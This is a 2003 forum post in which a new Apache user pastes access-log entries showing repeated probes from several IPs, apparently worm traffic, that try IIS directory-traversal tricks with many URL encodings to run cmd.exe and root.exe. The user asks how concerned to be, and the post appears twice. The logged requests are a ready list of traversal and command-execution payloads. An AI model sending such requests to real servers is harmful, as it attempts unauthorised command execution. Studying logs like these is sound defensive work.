JigPu
10-01-03, 07:15 PM
I recently installed Apache on one of my boxes to act as a web server (since Tripod sux :D). However, I've seen a bit of weird activity in my log files, and wondered if you guys could shed some light on exactly what people were trying to do.
12.222.218.32 - - [28/Sep/2003:23:20:40 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
12.222.218.32 - - [28/Sep/2003:23:20:40 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
12.222.218.32 - - [28/Sep/2003:23:20:40 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
12.222.218.32 - - [28/Sep/2003:23:20:41 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
12.222.218.32 - - [28/Sep/2003:23:20:41 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
12.222.218.32 - - [28/Sep/2003:23:20:41 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.222.218.32 - - [28/Sep/2003:23:20:41 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.222.218.32 - - [28/Sep/2003:23:20:42 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
12.222.218.32 - - [28/Sep/2003:23:20:42 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.222.218.32 - - [28/Sep/2003:23:20:42 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.222.218.32 - - [28/Sep/2003:23:20:43 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.222.218.32 - - [28/Sep/2003:23:20:43 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.222.218.32 - - [28/Sep/2003:23:20:43 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
12.222.218.32 - - [28/Sep/2003:23:20:43 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
12.222.218.32 - - [28/Sep/2003:23:20:44 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
12.222.218.32 - - [28/Sep/2003:23:20:44 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
12.228.179.12 - - [29/Sep/2003:02:05:04 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
12.228.179.12 - - [29/Sep/2003:02:05:04 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
12.228.179.12 - - [29/Sep/2003:02:05:04 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
12.228.179.12 - - [29/Sep/2003:02:05:04 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
12.228.179.12 - - [29/Sep/2003:02:05:04 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
12.228.179.12 - - [29/Sep/2003:02:05:04 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.228.179.12 - - [29/Sep/2003:02:05:05 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.228.179.12 - - [29/Sep/2003:02:05:05 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
12.228.179.12 - - [29/Sep/2003:02:05:05 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.228.179.12 - - [29/Sep/2003:02:05:05 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.228.179.12 - - [29/Sep/2003:02:05:05 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.228.179.12 - - [29/Sep/2003:02:05:05 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.228.179.12 - - [29/Sep/2003:02:05:05 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
12.228.179.12 - - [29/Sep/2003:02:05:05 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
12.228.179.12 - - [29/Sep/2003:02:05:05 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
12.228.179.12 - - [29/Sep/2003:02:05:06 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
202.133.229.254 - - [29/Sep/2003:08:21:47 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 333
12.248.71.122 - - [29/Sep/2003:10:13:51 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
12.248.71.122 - - [29/Sep/2003:10:13:52 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
12.248.71.122 - - [29/Sep/2003:10:13:52 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
12.248.71.122 - - [29/Sep/2003:10:13:52 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
12.248.71.122 - - [29/Sep/2003:10:13:52 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
12.248.71.122 - - [29/Sep/2003:10:13:53 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.248.71.122 - - [29/Sep/2003:10:13:53 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.248.71.122 - - [29/Sep/2003:10:13:53 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
12.248.71.122 - - [29/Sep/2003:10:13:53 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.248.71.122 - - [29/Sep/2003:10:13:53 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.248.71.122 - - [29/Sep/2003:10:13:54 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.248.71.122 - - [29/Sep/2003:10:13:54 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.248.71.122 - - [29/Sep/2003:10:13:54 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
12.248.71.122 - - [29/Sep/2003:10:13:54 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
12.248.71.122 - - [29/Sep/2003:10:13:54 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
12.248.71.122 - - [29/Sep/2003:10:13:55 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
12.27.234.57 - - [29/Sep/2003:11:16:25 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
12.27.234.57 - - [29/Sep/2003:11:16:27 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
12.27.234.57 - - [29/Sep/2003:11:16:28 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
12.27.234.57 - - [29/Sep/2003:11:16:30 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
12.27.234.57 - - [29/Sep/2003:11:16:32 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
12.27.234.57 - - [29/Sep/2003:11:16:34 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.27.234.57 - - [29/Sep/2003:11:16:35 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.27.234.57 - - [29/Sep/2003:11:16:36 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
12.27.234.57 - - [29/Sep/2003:11:16:36 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.27.234.57 - - [29/Sep/2003:11:16:37 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.27.234.57 - - [29/Sep/2003:11:16:39 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.27.234.57 - - [29/Sep/2003:11:16:41 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.27.234.57 - - [29/Sep/2003:11:16:43 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
12.27.234.57 - - [29/Sep/2003:11:16:44 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
12.27.234.57 - - [29/Sep/2003:11:16:45 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
12.27.234.57 - - [29/Sep/2003:11:16:47 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
Looks like a hack attempt to me since they keep trying to get my cmd.exe through different means. What little info I've found seems to say that this could be an attempt to exploit a IIS vunerability. Obviously I should be concerned, but how much?
JigPu
12.222.218.32 - - [28/Sep/2003:23:20:40 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
12.222.218.32 - - [28/Sep/2003:23:20:40 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
12.222.218.32 - - [28/Sep/2003:23:20:40 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
12.222.218.32 - - [28/Sep/2003:23:20:41 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
12.222.218.32 - - [28/Sep/2003:23:20:41 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
12.222.218.32 - - [28/Sep/2003:23:20:41 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.222.218.32 - - [28/Sep/2003:23:20:41 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.222.218.32 - - [28/Sep/2003:23:20:42 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
12.222.218.32 - - [28/Sep/2003:23:20:42 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.222.218.32 - - [28/Sep/2003:23:20:42 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.222.218.32 - - [28/Sep/2003:23:20:43 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.222.218.32 - - [28/Sep/2003:23:20:43 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.222.218.32 - - [28/Sep/2003:23:20:43 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
12.222.218.32 - - [28/Sep/2003:23:20:43 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
12.222.218.32 - - [28/Sep/2003:23:20:44 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
12.222.218.32 - - [28/Sep/2003:23:20:44 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
12.228.179.12 - - [29/Sep/2003:02:05:04 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
12.228.179.12 - - [29/Sep/2003:02:05:04 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
12.228.179.12 - - [29/Sep/2003:02:05:04 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
12.228.179.12 - - [29/Sep/2003:02:05:04 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
12.228.179.12 - - [29/Sep/2003:02:05:04 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
12.228.179.12 - - [29/Sep/2003:02:05:04 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.228.179.12 - - [29/Sep/2003:02:05:05 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.228.179.12 - - [29/Sep/2003:02:05:05 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
12.228.179.12 - - [29/Sep/2003:02:05:05 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.228.179.12 - - [29/Sep/2003:02:05:05 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.228.179.12 - - [29/Sep/2003:02:05:05 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.228.179.12 - - [29/Sep/2003:02:05:05 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.228.179.12 - - [29/Sep/2003:02:05:05 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
12.228.179.12 - - [29/Sep/2003:02:05:05 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
12.228.179.12 - - [29/Sep/2003:02:05:05 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
12.228.179.12 - - [29/Sep/2003:02:05:06 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
202.133.229.254 - - [29/Sep/2003:08:21:47 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 333
12.248.71.122 - - [29/Sep/2003:10:13:51 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
12.248.71.122 - - [29/Sep/2003:10:13:52 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
12.248.71.122 - - [29/Sep/2003:10:13:52 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
12.248.71.122 - - [29/Sep/2003:10:13:52 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
12.248.71.122 - - [29/Sep/2003:10:13:52 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
12.248.71.122 - - [29/Sep/2003:10:13:53 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.248.71.122 - - [29/Sep/2003:10:13:53 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.248.71.122 - - [29/Sep/2003:10:13:53 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
12.248.71.122 - - [29/Sep/2003:10:13:53 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.248.71.122 - - [29/Sep/2003:10:13:53 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.248.71.122 - - [29/Sep/2003:10:13:54 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.248.71.122 - - [29/Sep/2003:10:13:54 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.248.71.122 - - [29/Sep/2003:10:13:54 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
12.248.71.122 - - [29/Sep/2003:10:13:54 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
12.248.71.122 - - [29/Sep/2003:10:13:54 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
12.248.71.122 - - [29/Sep/2003:10:13:55 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
12.27.234.57 - - [29/Sep/2003:11:16:25 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
12.27.234.57 - - [29/Sep/2003:11:16:27 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
12.27.234.57 - - [29/Sep/2003:11:16:28 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
12.27.234.57 - - [29/Sep/2003:11:16:30 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
12.27.234.57 - - [29/Sep/2003:11:16:32 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
12.27.234.57 - - [29/Sep/2003:11:16:34 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.27.234.57 - - [29/Sep/2003:11:16:35 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.27.234.57 - - [29/Sep/2003:11:16:36 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
12.27.234.57 - - [29/Sep/2003:11:16:36 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.27.234.57 - - [29/Sep/2003:11:16:37 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.27.234.57 - - [29/Sep/2003:11:16:39 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.27.234.57 - - [29/Sep/2003:11:16:41 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
12.27.234.57 - - [29/Sep/2003:11:16:43 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
12.27.234.57 - - [29/Sep/2003:11:16:44 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
12.27.234.57 - - [29/Sep/2003:11:16:45 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
12.27.234.57 - - [29/Sep/2003:11:16:47 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
Looks like a hack attempt to me since they keep trying to get my cmd.exe through different means. What little info I've found seems to say that this could be an attempt to exploit a IIS vunerability. Obviously I should be concerned, but how much?
JigPu